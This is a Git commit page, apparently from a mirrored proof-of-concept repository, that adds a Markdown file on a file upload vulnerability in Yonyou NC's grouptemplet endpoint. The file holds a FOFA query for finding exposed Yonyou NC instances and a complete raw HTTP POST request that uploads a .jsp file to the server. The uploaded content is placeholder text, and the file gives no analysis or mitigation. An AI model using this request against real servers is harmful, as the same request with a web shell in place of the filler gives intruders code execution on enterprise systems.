mirror of
https://github.com/wooluo/POC00.git
synced 2026-03-17 23:54:51 +08:00
Create 用友NC_grouptemplet文件上传漏洞.md
This commit is contained in:
parent
5e13bc7c9a
commit
ca5f3e3efb
23
用友NC_grouptemplet文件上传漏洞.md
Normal file
23
用友NC_grouptemplet文件上传漏洞.md
Normal file
@ -0,0 +1,23 @@
|
|||||||
|
## 用友NC_grouptemplet文件上传漏洞
|
||||||
|
|
||||||
|
|
||||||
|
## fofa
|
||||||
|
```
|
||||||
|
title="YONYOU NC"
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## poc
|
||||||
|
```
|
||||||
|
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp&maxSize=999 HTTP/1.1
|
||||||
|
Host:
|
||||||
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEXmnamw5gVZG9KAQ
|
||||||
|
User-Agent: Mozilla/5.0
|
||||||
|
|
||||||
|
------WebKitFormBoundaryEXmnamw5gVZG9KAQ
|
||||||
|
Content-Disposition: form-data; name="file"; filename="test.jsp"
|
||||||
|
Content-Type: application/octet-stream
|
||||||
|
|
||||||
|
111111111111111111111
|
||||||
|
------WebKitFormBoundaryEXmnamw5gVZG9KAQ--
|
||||||
|
```
|
||||||
Loading…
x
Reference in New Issue
Block a user